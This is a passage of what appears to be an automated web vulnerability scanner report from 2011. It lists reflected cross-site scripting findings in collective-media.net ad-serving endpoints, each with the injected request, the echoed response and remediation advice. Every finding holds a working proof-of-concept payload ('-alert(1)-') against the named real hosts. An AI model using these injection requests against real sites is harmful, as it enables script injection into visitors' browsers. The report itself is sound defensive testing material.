Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 446
Date: Mon, 09 May 2011 16:04:41 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 16:04:41 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6008/be_life;sz=728x90;net=q1;ord=957064653?34c8e'-alert(1)-'337d27fc70;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.9. http://a.collective-media.net/adj/q1.q.gc.6008/life [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6008/life

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55956'-alert(1)-'8f11511390b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.600855956'-alert(1)-'8f11511390b/life;sz=728x90;ord=957049792? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 443
Date: Mon, 09 May 2011 16:04:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 16:04:26 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.600855956'-alert(1)-'8f11511390b/life;sz=728x90;net=q1;ord=957049792;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.10. http://a.collective-media.net/adj/q1.q.gc.6008/life [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6008/life

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0dbe'-alert(1)-'c276a0dda76 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6008/lifed0dbe'-alert(1)-'c276a0dda76;sz=728x90;ord=957049792? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 443
Date: Mon, 09 May 2011 16:04:27 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 16:04:27 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6008/lifed0dbe'-alert(1)-'c276a0dda76;sz=728x90;net=q1;ord=957049792;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.11. http://a.collective-media.net/adj/q1.q.gc.6008/life [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6008/life

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e74f'-alert(1)-'be7f0f43535 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6008/life;sz=728x90;ord=957049792?&5e74f'-alert(1)-'be7f0f43535=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 447
Date: Mon, 09 May 2011 16:04:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 16:04:26 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6008/life;sz=728x90;net=q1;ord=957049792?&5e74f'-alert(1)-'be7f0f43535=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.12. http://a.collective-media.net/adj/q1.q.gc.6008/life [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6008/life

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d8b9'-alert(1)-'66a150d2916 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6008/life;sz=728x90;ord=957049792?9d8b9'-alert(1)-'66a150d2916 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 444
Date: Mon, 09 May 2011 16:04:25 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 16:04:25 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6008/life;sz=728x90;net=q1;ord=957049792?9d8b9'-alert(1)-'66a150d2916;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.13. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_ent [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6008/be_ent

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94cec'-alert(1)-'4f83da16add was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj94cec'-alert(1)-'4f83da16add/q1.q.gc.6008/be_ent;sz=728x90;net=q1;ord=957008422;ord1=89470;cmpgurl=http%253A//www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup%253Fodyssey%253Dmod%25257Cnewswell%25257Ctext%25257CHome%25257Cs? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:03:35 GMT
Connection: close
Content-Length: 7518

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-59060200_1304957015","http://ad.doubleclick.net/adj94cec'-alert(1)-'4f83da16add/q1.q.gc.6008/be_ent;net=q1;u=,q1-59060200_1304957015,11f8f328940989e,ent,am.h-am.b-q1.polit_h-q1.none_m-q1.ent_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h;;cmw=owl;s
...[SNIP]...

2.14. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_ent [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6008/be_ent

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d15e7'-alert(1)-'0953c28d3fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6008d15e7'-alert(1)-'0953c28d3fb/be_ent;sz=728x90;net=q1;ord=957008422;ord1=89470;cmpgurl=http%253A//www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup%253Fodyssey%253Dmod%25257Cnewswell%25257Ctext%25257CHome%25257Cs? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:03:36 GMT
Connection: close
Content-Length: 7510

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-23255911_1304957016","http://ad.doubleclick.net/adj/q1.q.gc.6008d15e7'-alert(1)-'0953c28d3fb/be_ent;net=q1;u=,q1-23255911_1304957016,11f8f328940989e,ent,am.h-am.b-q1.polit_h-q1.none_m-q1.ent_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h;;sz=728x90;net=q1;ord1=
...[SNIP]...

2.15. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_ent [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6008/be_ent

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ad73'-alert(1)-'138ba3ecdad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6008/be_ent6ad73'-alert(1)-'138ba3ecdad;sz=728x90;net=q1;ord=957008422;ord1=89470;cmpgurl=http%253A//www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup%253Fodyssey%253Dmod%25257Cnewswell%25257Ctext%25257CHome%25257Cs? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:03:36 GMT
Connection: close
Content-Length: 7510

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-90702160_1304957016","http://ad.doubleclick.net/adj/q1.q.gc.6008/be_ent6ad73'-alert(1)-'138ba3ecdad;net=q1;u=,q1-90702160_1304957016,11f8f328940989e,ent,am.h-am.b-q1.polit_h-q1.none_m-q1.ent_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h;;sz=728x90;net=q1;ord1=89470;c
...[SNIP]...

2.16. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_ent [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6008/be_ent

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1ec2'-alert(1)-'5a2dc028ee6 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6008/be_ent;sz=e1ec2'-alert(1)-'5a2dc028ee6 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:03:34 GMT
Connection: close
Content-Length: 7469

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
leclick.net/adj/q1.q.gc.6008/be_ent;net=q1;u=,q1-97327231_1304957014,11f8f328940989e,none,q1.polit_h-q1.none_m-q1.ent_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h;;sz=e1ec2'-alert(1)-'5a2dc028ee6;contx=none;dc=w;btg=q1.polit_h;btg=q1.none_m;btg=q1.ent_h;btg=dx.16;btg=dx.23;btg=dx.17;btg=mm.ag1;btg=mm.ak1;btg=mm.am1;btg=mm.aq1;btg=cm.ent_h;btg=cm.music_h;btg=cm.weath_h?","e1ec2'-alert(1)-'5a2dc
...[SNIP]...

2.17. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_life [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6008/be_life

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43428'-alert(1)-'fe57fc5744c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj43428'-alert(1)-'fe57fc5744c/q1.q.gc.6008/be_life;sz=728x90;net=q1;ord=957064653;ord1=489085;cmpgurl=http%253A//www.courier-journal.com/section/FEATURES? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:04:42 GMT
Connection: close
Content-Length: 7546

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-46299121_1304957082","http://ad.doubleclick.net/adj43428'-alert(1)-'fe57fc5744c/q1.q.gc.6008/be_life;net=q1;u=,q1-46299121_1304957082,11f8f328940989e,food,am.h-am.b-q1.polit_h-q1.none_h-q1.ent_h-q1.food_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_
...[SNIP]...

2.18. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_life [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6008/be_life

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77ce8'-alert(1)-'aab4670083a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.600877ce8'-alert(1)-'aab4670083a/be_life;sz=728x90;net=q1;ord=957064653;ord1=489085;cmpgurl=http%253A//www.courier-journal.com/section/FEATURES? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:04:42 GMT
Connection: close
Content-Length: 7538

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-42375912_1304957082","http://ad.doubleclick.net/adj/q1.q.gc.600877ce8'-alert(1)-'aab4670083a/be_life;net=q1;u=,q1-42375912_1304957082,11f8f328940989e,food,am.h-am.b-q1.polit_h-q1.none_h-q1.ent_h-q1.food_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h;;sz=728x90;
...[SNIP]...

2.19. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_life [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6008/be_life

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46e4f'-alert(1)-'496a9811112 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6008/be_life46e4f'-alert(1)-'496a9811112;sz=728x90;net=q1;ord=957064653;ord1=489085;cmpgurl=http%253A//www.courier-journal.com/section/FEATURES? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:04:43 GMT
Connection: close
Content-Length: 7538

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
